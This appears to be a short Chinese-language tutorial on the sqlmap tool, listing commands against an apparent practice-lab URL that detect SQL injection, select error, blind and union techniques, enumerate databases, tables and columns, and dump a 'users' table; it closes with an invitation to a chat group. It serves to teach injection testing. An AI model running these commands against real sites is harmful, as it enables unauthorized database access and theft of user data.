注意:如果是多个参数,需要引号将注入点包含进去。
sqlmap.py -u “http://demo.sqli.com/Less-1/?id=1”
命令集合:
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --technique=E
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --technique=B
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --technique=U
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -v 3
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --dbms=”mysql”
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --dbs
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -D “dvwa” --tables
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -D “dvwa” -T “users” --columns
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -D “dvwa” -T “users” --dump
最常规的检测方法:
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1
检测结果显示参数id是注入点,可以报错注入,可以盲注,可以联合查询注入
指定某种注入类型,E是报错注入,B是盲注,U是联合注入
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --technique=E
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --technique=B
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --technique=U
显示详细的注入语句:-v 3
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -v 3
指定数据库注入:
-dbms=”mysql”是指定mysql数据库,这样sqlmap就只调用mysql的payload检测
-dbms=”mssql”是指定sqlserver数据库,这样sqlmap就只调用sqlserver的payload检测
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --dbms=”mysql”
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 --dbs
获取所有数据库
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -D “dvwa” --tables
获取数据库dvwa下的所有表
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -D “dvwa” -T “users” --columns
获取数据库dvwa里表users的所有列
sqlmap.py -u http://demo.sqli.com/Less-1/?id=1 -D “dvwa” -T “users” --dump
下载数据
周末群分享讲解SQL注入,有兴趣的可以加群:928233686